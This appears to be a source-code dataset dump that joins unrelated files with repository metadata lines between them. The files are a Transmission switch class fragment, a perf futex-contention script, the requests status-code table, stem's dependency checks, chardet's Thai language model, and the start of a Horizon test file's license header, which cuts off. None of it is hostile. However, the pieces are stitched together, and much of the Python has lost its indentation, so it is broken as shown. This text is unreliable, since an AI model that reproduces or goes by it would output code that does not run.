def __init__(self, transmission_client, name):
"""Initialize the Transmission switch."""
self._name = name
self.transmission_client = transmission_client
self._state = STATE_OFF
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def should_poll(self):
"""Poll for status regularly."""
return True
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self.transmission_client.set_session(alt_speed_enabled=True)
def turn_off(self, **kwargs):
"""Turn the device off."""
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self.transmission_client.set_session(alt_speed_enabled=False)
    def update(self):
        """Get the latest data from Transmission and update the state."""
active = self.transmission_client.get_session().alt_speed_enabled
self._state = STATE_ON if active else STATE_OFF
|
mit
|
civato/CivZ-SnapKat-SM_9005-900T
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
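# Usage sketch (illustrative only; the exact perf invocation depends on the
# local setup): the handlers above are driven by perf's Python scripting
# engine, typically along the lines of
#
#   perf record -e syscalls:sys_enter_futex -e syscalls:sys_exit_futex -a
#   perf script -s ./futex-contention.py
#
# where the second command replays the recorded futex events through
# syscalls__sys_enter_futex()/syscalls__sys_exit_futex() and trace_end()
# prints the per-(tid, lock) contention summary.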
|
gpl-2.0
|
manaschaturvedi/oscarbuddy
|
requests/status_codes.py
|
926
|
3200
|
# -*- coding: utf-8 -*-
from .structures import LookupDict
_codes = {
# Informational.
100: ('continue',),
101: ('switching_protocols',),
102: ('processing',),
103: ('checkpoint',),
122: ('uri_too_long', 'request_uri_too_long'),
200: ('ok', 'okay', 'all_ok', 'all_okay', 'all_good', '\\o/', '✓'),
201: ('created',),
202: ('accepted',),
203: ('non_authoritative_info', 'non_authoritative_information'),
204: ('no_content',),
205: ('reset_content', 'reset'),
206: ('partial_content', 'partial'),
207: ('multi_status', 'multiple_status', 'multi_stati', 'multiple_stati'),
208: ('already_reported',),
226: ('im_used',),
# Redirection.
300: ('multiple_choices',),
301: ('moved_permanently', 'moved', '\\o-'),
302: ('found',),
303: ('see_other', 'other'),
304: ('not_modified',),
305: ('use_proxy',),
306: ('switch_proxy',),
307: ('temporary_redirect', 'temporary_moved', 'temporary'),
308: ('permanent_redirect',
'resume_incomplete', 'resume',), # These 2 to be removed in 3.0
# Client Error.
400: ('bad_request', 'bad'),
401: ('unauthorized',),
402: ('payment_required', 'payment'),
403: ('forbidden',),
404: ('not_found', '-o-'),
405: ('method_not_allowed', 'not_allowed'),
406: ('not_acceptable',),
407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
408: ('request_timeout', 'timeout'),
409: ('conflict',),
410: ('gone',),
411: ('length_required',),
412: ('precondition_failed', 'precondition'),
413: ('request_entity_too_large',),
414: ('request_uri_too_large',),
415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
417: ('expectation_failed',),
418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
422: ('unprocessable_entity', 'unprocessable'),
423: ('locked',),
424: ('failed_dependency', 'dependency'),
425: ('unordered_collection', 'unordered'),
426: ('upgrade_required', 'upgrade'),
428: ('precondition_required', 'precondition'),
429: ('too_many_requests', 'too_many'),
431: ('header_fields_too_large', 'fields_too_large'),
444: ('no_response', 'none'),
449: ('retry_with', 'retry'),
450: ('blocked_by_windows_parental_controls', 'parental_controls'),
451: ('unavailable_for_legal_reasons', 'legal_reasons'),
499: ('client_closed_request',),
# Server Error.
500: ('internal_server_error', 'server_error', '/o\\', '✗'),
501: ('not_implemented',),
502: ('bad_gateway',),
503: ('service_unavailable', 'unavailable'),
504: ('gateway_timeout',),
505: ('http_version_not_supported', 'http_version'),
506: ('variant_also_negotiates',),
507: ('insufficient_storage',),
509: ('bandwidth_limit_exceeded', 'bandwidth'),
510: ('not_extended',),
}
codes = LookupDict(name='status_codes')
for (code, titles) in list(_codes.items()):
for title in titles:
setattr(codes, title, code)
if not title.startswith('\\'):
setattr(codes, title.upper(), code)
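# Usage sketch (illustrative): the loop above turns every alias into an
# attribute of ``codes``, plus an upper-case twin for aliases that do not
# start with a backslash, so lookups such as the following should hold:
#
#   codes.ok           # 200
#   codes.not_found    # 404
#   codes.NOT_FOUND    # 404 (the upper-case twin)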
|
mit
|
ewongbb/stem
|
stem/prereq.py
|
1
|
4914
|
# Copyright 2012-2017, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Checks for stem dependencies. We require python 2.6 or greater (including the
3.x series), but note we'll be bumping our requirements to python 2.7 in stem
2.0. Other requirements for complete functionality are...
* cryptography module
* validating descriptor signature integrity
::
check_requirements - checks for minimum requirements for running stem
is_python_3 - checks if python 3.0 or later is available
is_crypto_available - checks if the cryptography module is available
"""
import inspect
import sys
try:
# added in python 3.2
from functools import lru_cache
except ImportError:
from stem.util.lru_cache import lru_cache
CRYPTO_UNAVAILABLE = "Unable to import the cryptography module. Because of this we'll be unable to verify descriptor signature integrity. You can get cryptography from: https://pypi.python.org/pypi/cryptography"
PYNACL_UNAVAILABLE = "Unable to import the pynacl module. Because of this we'll be unable to verify descriptor ed25519 certificate integrity. You can get pynacl from https://pypi.python.org/pypi/PyNaCl/"
def check_requirements():
"""
Checks that we meet the minimum requirements to run stem. If we don't then
this raises an ImportError with the issue.
:raises: **ImportError** with the problem if we don't meet stem's
requirements
"""
major_version, minor_version = sys.version_info[0:2]
if major_version < 2 or (major_version == 2 and minor_version < 6):
raise ImportError('stem requires python version 2.6 or greater')
def _is_python_26():
"""
Checks if we're running python 2.6. This isn't for users as it'll be removed
in stem 2.0 (when python 2.6 support goes away).
:returns: **True** if we're running python 2.6, **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version == 2 and minor_version == 6
def is_python_27():
"""
Checks if we're running python 2.7 or above (including the 3.x series).
.. deprecated:: 1.5.0
Function lacks much utility and will be eventually removed.
:returns: **True** if we meet this requirement and **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version > 2 or (major_version == 2 and minor_version >= 7)
def is_python_3():
"""
Checks if we're in the 3.0 - 3.x range.
:returns: **True** if we meet this requirement and **False** otherwise
"""
return sys.version_info[0] == 3
@lru_cache()
def is_crypto_available():
"""
Checks if the cryptography functions we use are available. This is used for
verifying relay descriptor signatures.
:returns: **True** if we can use the cryptography module and **False**
otherwise
"""
from stem.util import log
try:
from cryptography.utils import int_from_bytes, int_to_bytes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import load_der_public_key
if not hasattr(rsa.RSAPrivateKey, 'sign'):
raise ImportError()
return True
except ImportError:
log.log_once('stem.prereq.is_crypto_available', log.INFO, CRYPTO_UNAVAILABLE)
return False
@lru_cache()
def is_mock_available():
"""
Checks if the mock module is available. In python 3.3 and up it is a builtin
unittest module, but before this it needed to be `installed separately
<https://pypi.python.org/pypi/mock/>`_. Imports should be as follows....
::
try:
# added in python 3.3
from unittest.mock import Mock
except ImportError:
from mock import Mock
:returns: **True** if the mock module is available and **False** otherwise
"""
try:
# checks for python 3.3 version
import unittest.mock
return True
except ImportError:
pass
try:
import mock
# check for mock's patch.dict() which was introduced in version 0.7.0
if not hasattr(mock.patch, 'dict'):
raise ImportError()
# check for mock's new_callable argument for patch() which was introduced in version 0.8.0
if 'new_callable' not in inspect.getargspec(mock.patch).args:
raise ImportError()
return True
except ImportError:
return False
@lru_cache()
def _is_pynacl_available():
"""
Checks if the pynacl functions we use are available. This is used for
verifying ed25519 certificates in relay descriptor signatures.
:returns: **True** if we can use pynacl and **False** otherwise
"""
from stem.util import log
try:
from nacl import encoding
from nacl import signing
return True
except ImportError:
log.log_once('stem.prereq._is_pynacl_available', log.INFO, PYNACL_UNAVAILABLE)
return False
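# Usage sketch (illustrative only; mirrors the module docstring above):
# callers typically run the version check once at import time and gate
# optional signature verification on the cryptography check, e.g.
#
#   import stem.prereq
#   stem.prereq.check_requirements()     # raises ImportError if python is too old
#   if stem.prereq.is_crypto_available():
#       pass  # safe to verify descriptor signatures here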
|
lgpl-3.0
|
timothsp/where2ate
|
venv/lib/python3.3/site-packages/pip/_vendor/requests/packages/chardet/langthaimodel.py
|
2930
|
11275
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbols (punctuation) that do not belong to a word
# 252: 0 - 9
# The following result for Thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40
188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50
253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60
96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70
209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222,
223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235,
236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57,
49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54,
45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63,
22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244,
11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247,
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
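# Reading the table above (illustrative): the raw byte value indexes the
# tuple, so for example TIS620CharToOrderMap[0x30] is 252 (the digit bucket
# for '0') and TIS620CharToOrderMap[0x20] is 253 (space, treated as a symbol
# that does not belong to a word).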
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences: 7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2,
3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2,
3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1,
3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1,
3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1,
2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1,
3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2,
1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3,
3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0,
1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2,
0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3,
0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0,
3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1,
2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2,
0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2,
3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0,
2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,
3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1,
2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1,
3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0,
3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1,
3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1,
3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1,
1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2,
0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3,
0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,
3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0,
3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1,
1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0,
3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1,
3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2,
0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0,
0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0,
1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1,
1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,
3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1,
0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0,
3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0,
0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1,
0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0,
0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1,
0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,
0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0,
0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1,
0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0,
0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0,
0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,
3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1,
2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,
0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0,
3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0,
1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,
1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
TIS620ThaiModel = {
'charToOrderMap': TIS620CharToOrderMap,
'precedenceMatrix': ThaiLangModel,
'mTypicalPositiveRatio': 0.926386,
'keepEnglishLetter': False,
'charsetName': "TIS-620"
}
# flake8: noqa
|
cc0-1.0
|
wangxiangyu/horizon
|
openstack_dashboard/dashboards/identity/projects/tests.py
|
15
|
80359
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
